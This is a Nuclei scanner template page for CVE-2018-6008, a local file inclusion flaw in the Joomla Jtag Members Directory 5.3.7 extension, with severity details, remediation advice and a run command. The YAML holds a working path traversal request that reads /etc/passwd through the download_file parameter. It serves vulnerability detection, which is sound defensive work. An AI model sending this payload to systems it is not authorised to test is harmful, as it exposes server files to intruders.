Skip to content
Nuclei Templates

Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion

ID: CVE-2018-6008

Severity: high

Author: daffainfo

Tags: cve2018,cve,joomla,lfi,edb,packetstorm,joomlatag,joomla\!

Description

Section titled “Description”

Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2018-6008


info:
  name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
  remediation: |
    Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/43913
    - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-6008
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-6008
    cwe-id: CWE-200
    epss-score: 0.3768
    epss-percentile: 0.97202
    cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: joomlatag
    product: jtag_members_directory
    framework: joomla\!
  tags: cve2018,cve,joomla,lfi,edb,packetstorm,joomlatag,joomla\!


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502203f6cd3f7a7676b023779b94f21453a1f1f3fe5b9436c984ff975562cbc8a5524022100cdcac3151647b4013a95b0e9b85579e5fcbf738b3cde2afecf2c5ee4f125e7bb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-6008.yaml"

View on Github